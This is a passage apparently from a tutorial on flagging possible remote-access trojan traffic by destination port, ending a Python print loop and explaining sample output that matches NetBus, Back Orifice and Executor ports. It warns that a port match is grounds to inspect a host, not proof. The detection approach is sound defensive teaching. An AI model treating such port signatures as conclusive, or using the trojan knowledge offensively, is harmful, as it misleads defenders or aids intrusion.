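        print(f"{f['src']} -> {f['dst']}:{f['dport']}/{f['proto']} "
              f"{', '.join(f['names'])} [{f['confidence']}]")
```

On the sample, the third line (the NetBus server answering the client on port 1999) and the sixth (an established segment) are skipped, leaving the UDP packet to 31337, the SYN to 12345, and a low-confidence SYN to port 80 that is far more likely a web browser than Executor. A port match is a reason to look at the host, not proof; as Joakim says, most of these trojans can be configured to listen anywhere.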